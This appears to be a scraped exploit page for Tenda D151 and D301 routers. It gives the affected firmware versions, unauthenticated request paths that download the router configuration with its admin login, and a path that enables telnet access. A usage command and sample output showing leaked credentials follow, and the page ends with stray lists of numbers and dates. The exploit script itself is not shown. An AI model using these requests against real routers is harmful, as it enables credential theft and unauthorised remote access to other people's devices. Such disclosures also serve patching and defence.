Tenda D151 D301 exploit (Proof of Concept)
Exploit Title: Tenda D151 & D301 - Unauthenticated configuration download (login included)
-
Exploit Author: BenChaliah
-
Vendor Homepage: https://www.tendacn.com
-
Software Link: https://www.tendacn.com/us/download/detail-3331.html
-
Versions:
- D301 1.2.11.2_EN
- D301 V2.0 50.22.1.8_EN
- D151 V2.0 50.21.1.5_EN
Description
This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage, you can also activate telnet service by requesting /goform/telnet (the service is already on by default, but this will execute an iptable command allowing access).
The configuration exists in the last part of the downloaded firmware image.
Usage (Python 2.7):
$ python exploit.py http://192.168.1.1
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -- By [email protected]@h
| D _]/\ \ -- github.com/BenChaliah
\___/ / /\ \
(_ )( _)
[!] Downloading config
username: admin
password: testpass
67 Jan 01, 2023
1 Nov 24, 2021
1.2k Dec 28, 2022
2 Nov 01, 2022
2 Jul 20, 2022
11 Nov 17, 2022
1 Jan 02, 2022
4 Feb 17, 2022
1 Jan 12, 2022
0 Dec 29, 2021
1 Nov 17, 2021
2 Oct 05, 2021
4 Mar 18, 2022
8 Nov 17, 2022
8 Aug 01, 2022
61 Oct 08, 2022
3 Jul 30, 2021
6 Aug 22, 2022
1 Jul 19, 2022